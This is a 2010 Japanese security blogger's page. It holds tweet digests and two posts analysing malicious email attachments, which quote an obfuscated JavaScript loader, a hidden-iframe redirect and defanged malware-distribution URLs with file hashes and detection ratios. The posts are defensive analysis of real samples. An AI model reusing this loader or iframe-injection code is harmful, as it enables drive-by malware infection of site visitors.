スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

09/29のツイートまとめ

dry2

えっ!、、、よし! QT @tessy_jp: もしかして今日は牛肉(9/29)の日?
09-29 19:25

そうなんだ!案外、互恵の国なんですね。 QT @itssay2: 新しいコラムが掲載されました。『上海はフリースポット天国!』http://itpro.nikkeibp.co.jp/article/COLUMN/20100927/352330/
09-29 19:22

「受動喫煙死6800人。交通事故死を抜く。」 何処の誰が亡くなったのだろうか。
09-29 10:33

ブログをアップしました。 09/28のツイートまとめ → http://am6.jp/aMf1z3
09-29 10:19

間食。 http://twitpic.com/2sxlpp
09-29 10:16

楽しみです。 QT @yuzawaws: 開催が近づき、久々のメルマガ配信です。今年のナイトセッションは、#librahack をテーマに、 @tetsutalow さんらを迎えたパネルディスカッションなる予定です。お楽しみに。
09-29 08:21

とんでもない!(笑) NHKでそう言っていたものですから!? QT @ooooooooo3: 必要なんですか? “@roko112: だよん! RT @dry2: そうか。老眼鏡とは言わないんだ。シニアグラス。”
09-29 08:07

老=オールド と習ったけど 今後はシニアか!老化はシニアニング。老猾はシニアインテリジェンス。老顔はシニアフェース。老犬はシニアドッグ。老酒はシニアワイン、、これは違うか(笑) QT @roko112: だよん! RT @dry2: 老眼鏡とは言わないんだ。シニアグラス。
09-29 07:57

ふむ。 http://www.netventure-news.com/news_snMvaRf7m.html ATMハッカー、ハッキングの手口を公開
09-29 07:51

恐らくその前に、事態に気付いていないのではないかと。気付いていなければ考慮もできないし、手も打てない。 QT @tetsutalow: 私は正直、@YanaseTooru 議員のhttp://bit.ly/9UeM6eに軽く失望しました。市民の代表たる議員は #librahack
09-29 07:10

続きを読む

スポンサーサイト

09/28のツイートまとめ

dry2

あざーす! QT @7th_stable: @dry2 お誕生日おめでとうございました!
09-28 23:55

ありがとうございます。うれしはずかしで、この歳だと。 QT @sumychicki: @dry2 おめでとうございますー!(^з^)-☆まだ間に合いますか…?
09-28 23:54

ありがとうございます。今年で34歳打ち止めです!♪ QT @occhie3: @dry2 遅くなりました。お誕生日おめでとうございますヽ(´ー`)ノ
09-28 23:54

今年からインクリメント無しです。プレゼントだけは受け付けてます。ニョンのipadカバーで良いですよ♪ RT @tacozzy: @dry2 インクリメントおめでとうございます。
09-28 21:04

皆様、ありがとうございます! QT @cchanabo: 今日は、ひこざこと @dry2 さんの誕生日なんだってー。 ひこざおめでとー。
09-28 19:15

いえいえ、良い経験してますね。風邪には気を付けて! QT @yamasaka_m: ここまで地を這って来るには休みが長い時でないとつらいので、 このチャンスにと思って来ました。 QT @dry2 先週塾長が行ってました。さすらいが多いですね。
09-28 14:45

広告サイトは明らかに狙われているんだよなぁ。ドライブバイダウンロード。うーん、むしろ、もはや広告サイトを標的としたガンブラーと言った方が良いのだろうな。
09-28 14:37

先週塾長が行ってました。さすらいが多いですね。 QT @yamasaka_m: http://twitpic.com/2spbyd 日本本土最東端の納沙布岬に到着。いくらなんでも風強すぎ。
09-28 14:27

http://sankei.jp.msn.com/affairs/crime/100928/crm1009281413024-n1.htm QT @dry2: 個人情報流出。ダウンロード者に削除要請はしないのだろうか。
09-28 14:26

個人情報流出。ダウンロード者に削除要請はしないのだろうか。mainichi.jp/select/wadai/news/20100928k0000e040040000c.html
09-28 14:22

続きを読む

09/27のツイートまとめ

dry2

はらへり。撤収!
09-27 23:53

弊社は、残念ながら広告は使ってなくて。 QT @yhitme: 小地球さんがぁと思ってしまったw RT @dry2: 弊社利用広告サーバーにおけるセキュリティ問題に関するお詫びとお願い http://ow.ly/2Ke2I
09-27 14:49

弊社利用広告サーバーにおけるセキュリティ問題に関するお詫びとお願い http://as-web.jp/news/info.php?c_id=7&no=29483
09-27 14:08

RT @tsuyachan55: さくらサーバー、中国からのサイバー攻撃にあってるみたいですね… - 艶ちゃんの憩いの部屋 http://bit.ly/ccZt4E #twitbackr
09-27 11:41

ブログをアップしました。 09/26のツイートまとめ → http://am6.jp/cCeoS6
09-27 09:01

09/26のツイートまとめ

dry2

なるほど! QT @yamasaka_m: 今回は福島まで夜行バス、福島から普通列車です。 QT @dry2 今回はどうやって行ったの? QT @yamasaka_m: 新幹線なら、一ノ関まで来て、そこから在来線ですね。 RT @yamasaka_m: 岩手県の水沢駅前です。
09-26 16:09

今回はどうやって行ったの? QT @yamasaka_m: 新幹線なら、一ノ関まで来て、そこから在来線ですね。 RT @yamasaka_m: 岩手県の水沢駅前です。 @yamasaka_m: http://twitpic.com/2s2lfp 水沢駅の郵
09-26 15:29

どうやって行くの?新幹線? RT @yamasaka_m: 岩手県の水沢駅前です。 QT @dry2 ここ、どこ? QT @yamasaka_m: http://twitpic.com/2s2lfp 水沢駅の郵便ポストの上に不思議なモノがのってる
09-26 14:28

あら。雨だ。
09-26 14:26

ブログをアップしました。 【黄金の日】芝浦運河散歩 → http://am6.jp/dq4ujw
09-26 14:18

ここ、どこ? QT @yamasaka_m: http://twitpic.com/2s2lfp 水沢駅の郵便ポストの上に不思議なモノがのってる
09-26 13:13

散歩ちう。 http://twitpic.com/2s2nrh
09-26 13:12

そう言えばお彼岸は過ぎたんだ。 http://twitpic.com/2s2n49
09-26 13:10

散歩しよう。
09-26 12:37

ブログをアップしました。 09/25のツイートまとめ → http://am6.jp/bAnJxB
09-26 09:42

【黄金の日】芝浦運河散歩



台風が去り、素晴らしい黄金の日。芝浦運河を散歩。

そうか、彼岸は過ぎたんだった。熔けるような日々も過ぎ去り、短い黄金の日々へ。

今日の水上バイクは、ずいぶんおとなしく、まあ、運河ツアーのような感じだけど、まだ暑かった一週間前の20日には、集団で爆走していた。あれは楽しいだろうな。

IMAG0259.jpg

IMAG0261.jpg

09/25のツイートまとめ

dry2

気を抜くな!! QT @OtsukaOtokoJuku: 関東暖ったけー
09-25 19:49

旨い!! http://twitpic.com/2rsfax
09-25 19:39

イオンメチャ込み。それにしてもプライベートブランド安くなった。一ヶ月に一度の食料調達。有難い。
09-25 17:02

わお!!猫が鳩を捕まえた!!凄い野生。
09-25 15:34

そう言えば、お袋に昔言われたことを思い出した。学校からの書類を適当に折って何時もくしゃくしゃで渡していたら、「あんた、幼稚園の折り紙で何を習った?」、どら「あれは、きちんと折るのが目的。書類は、読めれば良いでしょう。」的な受け答え。
09-25 14:50

配信会社は分かるはず。プッシュでの通知が重要だが、休みでコンタクトとれないところもあるかも。 QT @ymzkei5: @dry2 スラドの件 http://slashdot.jp/journal/516031/ と同じ根の話ですかね。どれくらいのサイトが影響を受けたんだろう。
09-25 14:38

大手サイトは利用者の安全に責任がある。広告コンテンツなど誘導先の監視は当たり前かと思うが。 QT @tetsutalow: なんですかこの微妙な責任転嫁っぷりは QT @dry2: 思わず、吹きだした。 http://bit.ly/cwNP5O 毎日jpをご利用の皆様におわび
09-25 14:17

これを調べようとして見つけてしまった。笑 http://mainichi.jp/select/today/news/20100925k0000e040043000c.html 思わず、吹きだした。 http://bit.ly/cwNP5O 毎日jpをご利用の皆様におわび
09-25 14:10

思わず、吹きだした。 http://bit.ly/cwNP5O 毎日jpをご利用の皆様におわび
09-25 14:06

内部から外に目をそらす作戦じゃないのか?
09-25 13:13

続きを読む

09/24のツイートまとめ

dry2

3時間半くらいかかりました。(TT) でも、放送は3秒くらいじゃないかと思います。もの凄い生産性。(笑) QT @nhirotw: @dry2 日曜日見ますね。
09-24 19:46

無いでしょうね。でも、今回デモのために動作するドライブと媒体の手配で難儀した点。 QT @LightSpeed_J: 二十歳くらい迄の人だとフロッピーなんて見たことなさそうですね QT @dry2: また、お仕事をしているシーンがほしいとのこと。日テレ バンキシャ 日曜
09-24 19:42

また、お仕事をしているシーンがほしいとのこと。日テレ バンキシャ 日曜 1800。フロッピとかの絵をとっている。もうすぐ終わります。
09-24 19:13

良いのよ!迷惑かけっぱなしでも。重要なのは相互の信頼&尊敬だと思います。返すことなどない。 QT @uematter: ありがとうございます!迷惑かけた分はきちんと対応して、次に繋げたいと思います。 QT @dry2: 「人は迷惑をかけるもの」「あなたも罪を犯している」が大前提
09-24 14:16

ふむ。逆に意見操作もやりやすい。あと、アイディア無くして改革できるのか?とも言いたい。ひねくれ者でして。 QT @kojinaka: @hideharus #opengovjp @renho_sha @kokumin_koe http://ow.ly/2J8Xs
09-24 13:58

やったー嬉しいなぁ!♪ QT @keaton_masuda: いまカミさんのMacBook Proを買ったんだが、黒シャツ白リンゴのねーちゃん、機嫌悪いのか、もの凄く対応が酷い。どの店舗の誰かを晒すつもりはないが、客の応対、基礎からやり直したほうがいい。
09-24 13:54

インドでの教え「人は迷惑をかけるもの」北欧の教え「あなたも罪を犯している」が大前提。無謬性は止めよう!バックを信じて! QT @uematter: どうしてこう、迷惑かけたくないと思うのに迷惑をかけてしまうのか。反省。
09-24 13:53

改ざんした日付の痕跡が何故何処に残るか、か。
09-24 12:40

うむ。この問題、現代版ABCD包囲網だな。一番喜ぶのは実はAじゃないか?
09-24 11:13

ブログをアップしました。 09/23のツイートまとめ → http://am6.jp/b6zJDV
09-24 09:24

続きを読む

09/23のツイートまとめ

dry2

切れる前のひと呼吸か。うーん。どらにはできそうに無い。切れてからのため息はいつもだけど、なにか?
09-23 23:54

はらへり。野暮レポートメール作成に時間を取られ、お客さんの研修資料と某新聞コラム原稿が大幅遅延。致しかたなし。後ろで鉄砲撃ってたほうが良いな。
09-23 21:55

ブログをアップしました。 【今日の難読スクリプト】続編 LZHのゼロデイ? → http://am6.jp/bnja1J
09-23 19:26

涼しい!肌寒い!嬉しい!
09-23 17:30

何に同意したのか分からないんだ!?(笑)やるなぁ。 QT @paper130: この約款は4.1にアップデートする時に表示されるやつなんで、ダウングレードしないと確認出来ないです(>_<) RT @dry2 約款とかは? QT @paper130: 消されたのは間違いないです。
09-23 16:53

掃除にするか、選択にするか、原稿書くか、晩飯の仕込みをするか。。。ひとまず、、、、、、寝よう。
09-23 13:06

色々話すのですが最終的に放送シナリオに合う部分が部品のように使われる。ま、それでも有難いことで。事件は会議室で起こっているのではない。フロッピーの中で起こっているんだと叫んでもね。(笑) QT @shita: おおおおおおおお!!! @dry2 さんが、、「特ダネ」に、、、
09-23 12:46

シャモニーとツェルマット。一回行って見たい。
09-23 12:35

ブログをアップしました。 【今日の難読スクリプト】本当によく考える → http://am6.jp/dmrLkb
09-23 10:48

覚えて頂いてありがとうございます。ラストシーズン。悔いのないように頑張ってください。 QT @takejap: ラックの西本さんってうちの部に、就活支援しにきてくれた人だ!
09-23 10:37

続きを読む

【今日の難読スクリプト】続編 LZHのゼロデイ?

件名
I've attached...I'm enclosing... the latest figures for you.

本文
I have attached the resume.

添付ファイル
77330resume.html

内容 はさっきの奴と一緒
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。(A)

誘導スクリプト → 中継点(A)→配布先

つまり、上記ような構造となっており、誘導スクリプトは姿を変えウイルス対策ソフトをかいくぐる、が誘導先(A)はそんなに変化しない。
ちなみに、このAのルート http://thfriisjensen.dk/ はこういうサイトだ。
thfriisjensendk.jpg

置き場にされているのだろう。で、今回は以下の内容だった。
h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきとは異なる。
さっき→h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param
今回→→h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post

さっきと違うことが分かります。ここにアクセスすると以下のものが落ちてきた。

h丁丁p://hojikyp.co.cc/news/exe.php?x=jar5 → lzhファイル
h丁丁p://hojikyp.co.cc/news/exe.php?x=jjar → lzhファイル →チェック結果
上記二つは同一ファイル。LZHの修復不可能な脆弱性を突くやつだろうか?もしそうだと目茶目茶やばいな。
MD5: 28f2ee30b443160f76166bd15287bb02
Date first seen: 2010-09-22 18:44:54 (UTC)
Date last seen: 2010-09-22 18:44:54 (UTC)
Detection ratio: 4/43

検体を、ジェペットおじさんとピノキオさんら、クジラの中の人に送ってコメントをもらおう。

21:21 追記
クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。


もしこれが、LZHのゼロデイならば作者は、使用をやめてくれと言っているが、それではだめだ。
LZH系のアプリやDLLをアンインストールしないといけない。

勝手にダウンロードされてしまうからだ。

h丁丁p://hojikyp.co.cc/news/j.php → javaプログラム →チェック結果
MD5: 84f5defe4328d0c31cafb136a3cc5a89
Date first seen: 2010-09-13 10:41:25 (UTC)
Date last seen: 2010-09-23 02:03:33 (UTC)
Detection ratio: 8/42

h丁丁p://hojikyp.co.cc/news/jar5.php → javaプログラム →チェック結果
MD5: 4eea7ae357eecaa94c084083dd4e56da
Date first seen: 2010-09-14 08:04:12 (UTC)
Date last seen: 2010-09-23 08:27:00 (UTC)
Detection ratio: 11/43

h丁丁p://hojikyp.co.cc/news/js.php → javaスクリプト →チェック結果
MD5: b74b43a2fe25a8b253a4310ee827ae77
Date first seen: 2010-05-28 12:53:42 (UTC)
Date last seen: 2010-09-23 08:54:44 (UTC)
Detection ratio: 3/43

続きを読む

【今日の難読スクリプト】本当によく考える

件名
resume

本文
You must enable JavaScript to see this text.

添付ファイル
32027resume.html

中身 こういう感じのスクリプトが、、
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。

で、落ちてくるのがこれ。
document.write("<iframe src='h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param' width='1' height='1' style='visibility: hidden;'></iframe>");

要は、iframneタグで誘導ですね。

で、誘導先
h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param

は、どうもwiqosah.co.ccが名前解決できない。誰か止めたのでしょう。

それにしても最近よ奴は
1.ISPのスパムフィルタをくぐることが多い
2.ISPのアンチウイルスGWをくぐりぬける。

変化早いね。添付するコードと文面パターンなどの自動ジェネレータなんかで作ってやっているような感じだな。

09/22のツイートまとめ

dry2

ぱぱ!そう言えばサイディアって本当に消されたの?アップデート時の約款や注意書きってどうなってるんだろう。 QT @paper130: そーだそーだぁ!俺も今夜中にでるぞ。一緒にいくか?
09-22 22:44

三時間も学べたのですね。 QT @danielmaruyama: @dry2 今日は3時間スペシャルだったらしいです。>学べるニュース
09-22 22:11

うー。うー。再放送! QT @mlius: @dry2 今日のテレビ朝日「池上彰の学べるニュース」のテーマがクラウドや暗号化についてだったのですよ!
09-22 22:09

ありがとうございます。分かり安いのでしょうね。 QT @coccokun: @dry2 今日、池上さんスペシャルがあって、そこでクラウドコンピューティンと暗号について解説があったのです(´・ω・)
09-22 22:07

はらへり。撤収。ところで、TLに出ている池上彰さんのクラウドとか暗号とかって何だろう?
09-22 21:56

そーす!8時半くらいらしいです。出来るだけわかりやすくコメントしたつもりですが。 QT @Hauoo: 明日ですかね?RT @dry2 フジテレビ 特ダネ 小倉さんの奴の収録。ほぼ終わり。なんか仕事をしてそうな絵をとるそうなので、つぶやきを。
09-22 21:46

全くです。見ないようにしているのですが、今日は興味があり見ました。昨日だったら別なコメントが使われたかも。いずれにせよ、拾っていただいているということは幸せなことと感謝します。 QT @cyberkobe: @dry2 自分の声とか姿ってあんまりみたくないですよね・・・
09-22 21:45

ワンセグで見ました。恥ずかしい、、、なんかしゃべっていた。 QT @cyberkobe: @dry2 写ってますよ!
09-22 21:03

今日のニュース9の可能性ありだって!?本当かな? QT @dry2: 逮捕とかぶるらしい。かぶったら、どらは抹殺。 QT @dry2: 終わりました。ニュース9らしい。 QT @cchanabo: おっ? QT @Akira_Murakami:
09-22 20:59

お通しで終わりじゃないの???くーーー! QT @OtsukaOtokoJuku: 美味しゅうございました。RT @dry2 きーーー!! QT @OtsukaOtokoJuku: お通しがカニかよ! めんどくさい。 http://twitpic.com/2qu6cu
09-22 20:31

続きを読む

09/21のツイートまとめ

dry2

はらへり。
09-21 23:23

そうす!onmouseで、多分。(笑) QT @paper130: ん!?ウイルス化してる?CSRFの中味が変わってる?ツィート内容がCSRFになってるのか?
09-21 23:17

かぶりましたね。でも、内容は大したことないので単に更新日付は誰でも変更できるよ!というだけです。 QT @cchanabo: ニュース9ではなかったね。 RT @cchanabo かぶりそう。 RT @dry2 逮捕とかぶるらしい。かぶったら、どらは抹殺。
09-21 23:16

.co/ で検索しても凄いな。
09-21 22:16

a.coもある、、、
09-21 22:13

t.coなどで、TLを検索すると規模がおおむねわかる。
09-21 22:09

本当に拝聴したかった。残念です。 QT @OSpenser: "戦国武将のリーダーシップ"、小和田先生ありがとうございました。私も家康が好きです。(笑)
09-21 22:07

やばいなぁ。メールの添付スクリプトの変異も早い。使い手だと思う。このあたり、基盤がでかいしリアルタイムだけに拡大も早い。 QT @Penangal: @dry2 拡散する過程で外部CSSを読み込ませる方法が編み出されたり、スクリプトの内容に自動的にRTやpostさせる仕組みが
09-21 21:31

t.coもあるな。 QT @dry2: ttp://a.no ってなんだ。ずいぶん多くの人がTweetしてるけど。 なんかのクロスサイトリクエストフォージェリとかで短縮URLで踏ませているとか。
09-21 21:25

ttp://a.no ってなんだ。ずいぶん多くの人がTweetしてるけど。 なんかのクロスサイトリクエストフォージェリとかで短縮URLで踏ませているとか。
09-21 21:23

続きを読む

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。